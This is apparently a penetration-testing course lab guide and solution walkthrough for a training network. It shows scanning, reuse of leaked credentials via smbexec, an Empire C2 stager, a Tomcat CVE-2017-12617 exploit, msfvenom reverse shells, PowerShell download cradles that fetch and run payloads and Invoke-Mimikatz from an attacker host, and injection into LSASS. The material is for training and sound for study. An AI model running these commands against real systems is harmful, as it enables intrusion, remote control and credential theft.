© 2018 Caendra Inc.

| Hera for PTPv5 | Leveraging PowerShell During 1

Exploitation
You have been tasked by an organization to conduct an external penetration test. The
organizations’ publicly-facing IP address range is 172.16.80.0/24.

Your tester IP address is within the 175.12.80.0/24 range.

Task: Perform remote exploitation and post-exploitation tasks on vulnerable systems, and
gain access to the internal net block leveraging powershell and related tools for as many
tasks as possible.

Network Diagram:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 2

Exploitation
 • Identify vulnerabilities from a remote exploitation perspective.
• Exploit discovered vulnerabilities.
• Obtain access to machines on other internal subnets.
• Use PowerShell and related tools for tasks where applicable.

• PowerShell
• Empire
• Smbexec
• Nmap
• Metasploit

One of the systems on the external IP range contains a vulnerability or misconfiguration.

Identify the vulnerability or misconfiguration and obtain access to the vulnerable target
with the ability execute commands.

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 3

Exploitation
Using your ability to execute remote commands on the vulnerable system, use Empire to
generate a PowerShell-based stager and obtain an agent connection from the target, and
furthermore conduct some recon about the system and internal network using Empire
modules.

Using information obtained via recon of the system, and other machines on the internal
network, pivot to, and exploit an internal system and obtain a SYSTEM meterpreter session.

From the meterpreter-based session on the exploited internal target system, use a
powershell download cradle to dump password hashes using a powershell-based MimiKatz
hosted on the attacker system.

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 4

Exploitation
© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 5
Exploitation
Below, you can find solutions for each task for the Remote Exploitation and Post-
Exploitation tasks. Remember though that you can follow your own strategy (which may
be different from the one explained in the following lab).

Using nmap, we conduct a ping scan to identify live hosts within the in-scope external
network range:

# nmap -sn 172.16.80.1/24

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-06 21:59 EDT
Nmap scan report for 172.16.80.1
Host is up (0.050s latency).
Nmap scan report for 172.16.80.100
Host is up (0.058s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.48 seconds

From the scan, we find two hosts, our focus will be on the 172.16.80.100 system.

Since our identified systems are minimal at this point, we can run a scan for all 65535 TCP
ports to start our enumeration process on the system of interest:

# nmap -sS -p- 172.16.80.100

Scanning 172.16.80.100 [65535 ports]
Discovered open port 135/tcp on 172.16.80.100
Discovered open port 139/tcp on 172.16.80.100
Discovered open port 445/tcp on 172.16.80.100
Discovered open port 7680/tcp on 172.16.80.100
. . .
Discovered open port 65520/tcp on 172.16.80.100
Discovered open port 4983/tcp on 172.16.80.100

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 6

Exploitation
The port scan reveals several common NetBIOS ports, but more importantly, there are
several which catch our attention due to being unknown, or unidentified at this point in the
engagement. In particular, we’ll focus on port 4983 since after enumerating several of the
others, returned nothing particularly fruitful.

A service scan reveals that this is potentially an HTTP port, we can we can see with the
banner returned by an nmap version scan:

# nmap -sV 172.16.80.100 -p 4983

Nmap scan report for 172.16.80.100
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
4983/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Our next step, is to see if we can gain any more additional insight as to the purpose of this
port, we can either browse to it, or issue a GET request via netcat. We opt to browse to the
port and are presented with some credentials in what appears to be a configuration file of
sorts:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 7

Exploitation
Alternatively, we find that also initiating a netcat connection to the port, and issuing a “GET”
request for the root “/” also returns the same information.

# nc 172.16.80.100 4983
GET /
@echo off net use "\\10.100.11.150\C$" /user:local_admin P@ssw0rd123 if
exist "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" ( echo
"Copying errors..." copy
"\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt"
C:\Users\local_admin\Logs\Host1\ del
"\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" ) else ( echo
"No errors!" ) net use "\\10.100.11.150\C$" /delete

Now that we’ve obtained some credentials, we can try and use those credentials to execute
commands using the “smbexec.py” tool (part of the impacket toolkit). We know the system
is exposing NetBIOS ports, so we will attempt to exploit those ports with our newly obtained
credentials.

First, we use smbexec to get a semi-interactive shell on the target (possible since we found a
privileged set of credentials):

# python smbexec.py 'local_admin:P@ssw0rd123'@172.16.80.100

Note: A quick note about smbexec.py. Every so often, if you exploit the machine with the above
method, and it fails, or disconnects for whatever reason, due to the way smbexec creates a
BTOBTO service, it may fail to delete the created service causing re-exploitation to fail. This
may require a machine reset if in the rare case you need to re-exploit the machine using that
specific attack vector.

We conduct some basic local enumeration, show the interfaces configured on the system,
and determine the system is multihomed, with an interface configured for the internal
network (10.100.11.101):

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 8

Exploitation
C:\windows\system32> ipconfig

We also run the “echo %userdomain%” command to see if our current user is part of a
domain, a quick way to get the current domain name if present, and we also learn that the
user is part of the domain “ELS-CHILD”:

C:\Windows\system32>echo %userdomain%
ELS-CHILD

Our next task is to obtain a connection from the system back to an Empire listener. Before
getting started with this step, please follow the instructions on installing Empire here:

https://github.com/EmpireProject/Empire#install

Note: This lab was tested with Version 2.1 of Empire. Later versions may have some issues in
regard to following the lab tasks presented here. Please download the correct version from the
following link: https://github.com/EmpireProject/Empire/releases

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 9

Exploitation
Once Empire has been installed, we can launch it by simply executing the ./empire command
from within the Empire directory:

# ./empire

At the (Empire) > prompt, we type the “Listeners” command to enter into the Listeners
menu:

(Empire) > listeners

[!] No listeners currently active

Next, we configure a new “http” listener by issuing the “uselistener” command followed by
“http,” which will put us in the http listener configuration area:

(Empire: listeners) > uselistener

dbx http_com http_hop meterpreter redirector

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 10

Exploitation
http http_foreign http_mapi onedrive
(Empire: listeners) > uselistener http

The “info” command can then be used to view all options related to the http listener we’ve
selected, and can be used similarly to how we set options with metasploit; with the “set
<option> <value> syntax.

(Empire: listeners/http) > info

There are several options available, but most importantly, for now, let’s just set the “Host”
option with our OpenVPN tunnel interface IP address which should be in the 175.12.80.0/24
range:

(Empire: listeners/http) > set Host 175.12.80.20

Once that is complete, we use the “Execute” command to initialize our listener:

(Empire: listeners/http) > execute

[*] Starting listener 'http'
[+] Listener successfully started!

Now that our listener is up and “listening,” we’ll want to generate a “stager.” The “Stager” is
the code we’re going to run on our target once we generate it. We can generate a stager by
first exiting out of the “Listener” area back to the “main” section by executing the “main”
command and then typing the “usestager” command. If we type “usestager <space> <tab>”
we should get a listing of all available stagers:

<Empire: listeners/http) > main

(Empire) > usestager

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 11

Exploitation
We’ll select the “multi/launcher” stager by issuing the “usestager multi/launcher” command:

(Empire) > usestager multi/launcher

And again, we’ll configure the necessary options, which is typically just telling the stager
which listener to connect back to. We use the “set Listener <listener name>” command here.
In this Example, our listenername was “http”:

(Empire: stager/multi/launcher) > set Listener http

Once our stager is configured with the name of the listener, we can once again type the
“Execute” command to have Empire generate our stager code:

(Empire: stager/multi/launcher) > execute

At this point, Empire has generated a powershell encoded command; we will then execute it
on the smbexec shell we obtained previously:

We then copy and paste the Empire-generated powershell code, to our smbexec shell and
press <enter>. Upon doing so, we should receive an agent connection back to our Empire
listener:

(Empire: stager/multi/launcher) > [+] Initial agent YC7T8PM2 from

172.16.80.100 now active

If we now type the “agents” command within Empire, we can confirm our agent has phoned-
home to the Empire C2 and is currently active via the “powershell” process on the target
system:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 12

Exploitation
(Empire: stager/multi/launcher) > agents

Seeing as we had determined that our agent had an internal interface configured with an IP
address on the 10.100.11.0/24 network, our first task should be to identify live hosts on that
subnet. We conduct an ARP scan against the 10.100.11.0/24 range.

We can use the “arpscan” module to accomplish this. First, we should interact with the agent
by using the “interact” command followed by our active agent name:

(Empire: agents) > interact YC7T8PM2

(Empire: YC7T8PM2) >

We can then load the “arpscan” module with the “usemodule” command:

(Empire: YC7T8PM2) > usemodule situational_awareness/network/arpscan

(Empire: powershell/situational_awareness/network/arpscan) >

We then set the CIDR block for the 10.100.11.0/24 network, and the agent name, and run the
“execute” command:

(Empire: powershell/situational_awareness/network/arpscan) > set CIDR

10.100.11.0/24
(Empire: powershell/situational_awareness/network/arpscan) > set Agent
YC7T8PM2
(Empire: powershell/situational_awareness/network/arpscan) > execute

After several seconds, our agent returns the results of the ARP scan:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 13

Exploitation
We can then port scan the identified hosts with the “portscan” module. We will scan the
10.100.11.100 host, as this is a new host we were initially unaware of.

Let’s first load the portscan module with the usemodule command, configure the “Hosts”
value and set our Agent name as well, and finally run the “execute” command:

(Empire: powershell/situational_awareness/network/arpscan) > usemodule

powershell/situational_awareness/network/portscan
(Empire: powershell/situational_awareness/network/portscan) > set Hosts
10.100.11.100
(Empire: powershell/situational_awareness/network/portscan) > set Agent
YC7T8PM2
(Empire: powershell/situational_awareness/network/portscan) > execute

We’ve identified TCP 8443 as being open on another internal machine. However, our next
step is to use our current host as a pivot to the newly found machine, and port.

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 14

Exploitation
Now that we have information on yet another internal machine, at 10.100.11.100, and have
identified an open port, let’s move onto pivoting from our current host to the new one.

Since we’re going to need some additional tools (Metasploit) to accomplish the next task, we
need to transfer our existing Empire Agent over to Metasploit. We can use the Empire
“invoke_metasploitpayload” module for this. The module, as its name implies, allows us to
execute a Metasploit payload, which will effectively send our empire agent to a listener we
have configured within Metasploit.

Our first step is to generate a payload we can feed to the Empire agent. We’ll use Metasploit’s
“web_delivery” module for this. The web_delivery module will allow us to generate a
powershell payload URL, which we will then provide to the empire agent via the
“invoke_metasploitpayload” module.

In Metasploit, let’s first prepare the “web_delivery” module.

msf > use exploit/multi/script/web_delivery

Next, we set the “target” option to “2” in order to use a compatible powershell payload:

msf exploit(multi/script/web_delivery) > set target 2

We then configure our SRVHOST IP address option. This is the IP address our web_delivery
module will bind to. It should be the testers’ VPN Tunnel Interface IP address:

msf exploit(multi/script/web_delivery) > set SRVHOST 175.12.80.21

Lastly, we configure a payload option and our LHOST IP for the payload. We’ll use a windows
meterpreter reverse_tcp payload:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 15

Exploitation
msf exploit(multi/script/web_delivery) > set payload
windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set LHOST 175.12.80.21

And finally, we run the “exploit -j” command to initialize our handler, and generate our
Powershell Payload URL:

msf exploit(multi/script/web_delivery) > exploit -j

We’re going to use the URL identified by the “Using URL:” message in the above web_delivery
module output.

http://175.12.80.21:8080/JAFRM0WEjw6cf

Back at our Empire C2, in order to pass our agent to metasploit, we need to load the
“invoke_metasploitpayload” module.

(Empire: powershell/situational_awareness/network/portscan) > usemodule

code_execution/invoke_metasploitpayload

We then configure the “URL” value to be that of our metasploit web delivery URL and assign
the stager to an Active agent in Empire, and finally, when that is complete, we can use the
“Execute” command.

Empire: powershell/code_execution/invoke_metasploitpayload) > set URL

http://175.12.80.21:8080/JAFRM0WEjw6cf
(Empire: powershell/code_execution/invoke_metasploitpayload) > set Agent
U6XFELVM
(Empire: powershell/code_execution/invoke_metasploitpayload) > execute

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 16

Exploitation
Upon doing that, our Metasploit handler has now received a connection from the agent, and
we can continue with our task of pivoting and exploiting the 10.100.11.100 target:

Now that we’ve transferred our agent to Metasploit, we’ll first want to run the “autoroute”
module on our new meterpreter session. This will add the necessary routes to the Metasploit
routing table that will allow us to pivot to the 10.100.11.100 machine:

msf exploit(multi/script/web_delivery) > use post/multi/manage/autoroute

msf post(multi/manage/autoroute) > set SESSION 1
msf post(multi/manage/autoroute) > run

Now that our routes to the 10.100.11.0/24 network are in place, we can use the socks4a
module to proxy the 10.100.11.100 machine and conduct additional recon:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 17

Exploitation
msf post(multi/manage/autoroute) > use auxiliary/server/socks4a

We’ll then set our proxy SRVHOST value to be that of our VPN tunnel IP address, and run the
module:

msf auxiliary(server/socks4a) > set SRVHOST 175.12.80.21

SRVHOST => 175.12.80.21
msf auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 1.
[*] Starting the socks4a proxy server

Next, after we’ve configured our browser to use our socks4a proxy:

We should able to browse to the TCP 8443 port that we discovered on the 10.100.11.100
machine, and we discover an Apache Tomcat configured with version 7.0.81:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 18

Exploitation
We find that the host manager is password protected, but we know from conducting
research on this particular version of Apache Tomcat, that it may be vulnerable to CVE-2017-
12617, which allows for the uploading of arbitrary JSP files when Tomcat is configured to
allow PUT requests:

We can also see there is a Metasploit module available. Before we can try to exploit this, we
need to use the “portproxy” module so that the payload can successfully connect back from
the internal machine, to our tester IP address by proxying the connection from the first host
we compromise, the 10.100.11.101 machine.

We first load the portproxy module in Metasploit:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 19

Exploitation
msf exploit(multi/http/tomcat_jsp_upload_bypass) > use
post/windows/manage/portproxy

We then configure our CONNECT_ADDRESS, CONNECT_PORT, LOCAL_ADDRESS and

LOCAL_PORT options, as well as tell the portproxy to execute the module on our current
session with the SESSION value:

msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.12.80.21

msf post(windows/manage/portproxy) > set CONNECT_PORT 4444
msf post(windows/manage/portproxy) > set LOCAL_ADDRESS 10.100.11.101
msf post(windows/manage/portproxy) > set LOCAL_PORT 4444
msf post(windows/manage/portproxy) > set SESSION 1
msf post(windows/manage/portproxy) > run

Once the portproxy is configured, we can load our Tomcat Exploit module for the JSP Upload
Bypass vulnerability, and configure it. We need to modify the default RPORT option to be
that of the TCP port 8443 we found, and we’ll also need to change the default payload as well,
in addition to making sure we also define our LHOST to be that of the pivot machine’s
external IP 172.16.80.100:

msf post(windows/manage/portproxy) > use

exploit/multi/http/tomcat_jsp_upload_bypass
msf exploit(multi/http/tomcat_jsp_upload_bypass) > set RHOST 10.100.11.100
msf exploit(multi/http/tomcat_jsp_upload_bypass) > set RPORT 8443
msf exploit(multi/http/tomcat_jsp_upload_bypass) > set LHOST 172.16.80.100
msf exploit(multi/http/tomcat_jsp_upload_bypass) > set payload
java/jsp_shell_reverse_tcp

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 20

Exploitation
msf exploit(multi/http/tomcat_jsp_upload_bypass) > run

At this point, we should have received a shell from the Tomcat system:

Our next step, is to upgrade our shell to a meterpreter shell. We’ll accomplish this by first
generating a new payload, and then use python’s SimpleHTTPServer to host it, and deliver it
to the tomcat host via a powershell download cradle.

First, we generate our payload:

# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.100.11.101

LPORT=4444 -f exe > /tmp/payload.exe

We then host the payload with a python SimpleHTTPServer on port 8000 on our attacker
machine:

# cd /tmp && python -m SimpleHTTPServer 8000

We then need to create another portproxy to serve the payload to the Tomcat machine and
configure it on the windows 7 pivot host SESSION:

msf exploit(multi/http/tomcat_jsp_upload_bypass) > use

post/windows/manage/portproxy
msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.12.80.22
msf post(windows/manage/portproxy) > set CONNECT_PORT 8000
msf post(windows/manage/portproxy) > set LOCAL_ADDRESS 10.100.11.101
msf post(windows/manage/portproxy) > set LOCAL_PORT 8000
msf post(windows/manage/portproxy) > set SESSION 1
msf post(windows/manage/portproxy) > run

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 21

Exploitation
We should now have two portproxies configured, one for the previous tomcat listener, and
a new one which we’re going to use to the serve our meterpreter payload to the tomcat
machine:

We then need to configure a new listener to accept the connection from our payload.exe once
we execute it on the Tomcat system, but first, we need to kill our previous listener:

msf post(windows/manage/portproxy) > jobs -K

msf post(windows/manage/portproxy) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 175.12.80.22
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit -j

Once our new listener is running, we can execute the following powershell download cradle
from the tomcat session:

C:\Program Files\Apache Software Foundation\Tomcat 7.0>powershell -c iex

(New-Object
Net.WebClient).DownloadFile('http://10.100.11.101:8000/payload.exe',
'C:\Windows\Temp\payload.exe')

And then execute our payload, which should now be in the C:\windows\Temp directory on
the tomcat machine:

C:\Program Files\Apache Software Foundation\Tomcat

7.0>C:\windows\temp\payload.exe

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 22

Exploitation
At which point, we should then get a new upgraded meterpreter shell from the tomcat
machine:

[*] Sending stage (206403 bytes) to 172.16.80.100

[*] Meterpreter session 3 opened (175.12.80.22:4444 -> 172.16.80.100:49885)
at 2018-03-20 13:21:43 -0400

Our last task is to use the meterpreter shell to download a powershell-based mimikatz to
dump local credentials from the Tomcat System using a powershell download cradle.

Since our portproxies are already configured, this task should be a bit more straightforward.

First, let’s make sure we’re hosting the Invoke-MimiKatz.ps1 script on our attacker system,
again in the /tmp directory, for which we should already have a python web server running
on port 8000.

Download the mimikatz script from here:

https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-
Mimikatz/Invoke-Mimikatz.ps1

And copy it into your /tmp directory on the attacker machine.

Next, on our new SYSTEM meterpreter session on the Tomcat machine back on metasploit,
we can drop into a shell with the “shell” command:

meterpreter > shell

meterpreter > shell
Process 3720 created.
Channel 8 created.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\Temp>

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 23

Exploitation
We can then use the following command to download and execute our MimiKatz script
hosted on our attacker machine:

C:\Windows\Temp> powershell -c iex (New-Object

Net.WebClient).DownloadString('http://10.100.11.101:8000/Invoke-
Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

At which point, we have successfully obtained hashes:

It should also be noted that another useful command we can use with Empire is the “psinject”
module.

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 24

Exploitation
The “psinject” will allow us to inject our agent into another process, which is useful for
maintaining a stable process if our existing process isn’t playing nicely.

To use the psinject module, we should first, interact with our agent; we can do that with the
“interact <agent name> command. Once we interact with our agent, we can issue the “shell
ps” command to execute a shell command on the target that will list all of the processes:

(Empire: agents) > interact DEAW39F4

(Empire: DEAW39F4) > shell ps
[*] Tasked DEAW39F4 to run TASK_SHELL
[*] Agent DEAW39F4 tasked with task ID 1
(Empire: DEAW39F4) >
[*] Agent DEAW39F4 returned results.

Next, let’s use the “psinject” module to inject into the LSASS process for a bit more stability
with our tasks. We can use the “searchmodule” command to find modules. We then use the
“usemodule <module name>” command to load the module we’d like to use, in this case, the
psinject module:

(Empire: DEAW39F4) > searchmodule psinject

powershell/management/psinject

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 25

Exploitation
Utilizes Powershell to inject a Stephen Fewer formed ReflectivePick
which executes PS codefrom memory in a remote process
(Empire: DEAW39F4) > usemodule management/psinject

The LSASS PID from our previous “shell ps” output showed that the PID for the LSASS process
was 472, let’s use psinject to inject into that process. First, we tell it the Agent to use with the
“set Agent <Agent>” command, then the Listener, and ProcId values:

(Empire: powershell/management/psinject) > set Agent DEAW39F4

(Empire: powershell/management/psinject) > set Listener http
(Empire: powershell/management/psinject) > set ProcId 472
(Empire: powershell/management/psinject) > execute

Once that is done, a new agent should phone-home, from the lsass process:

© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During 26

Exploitation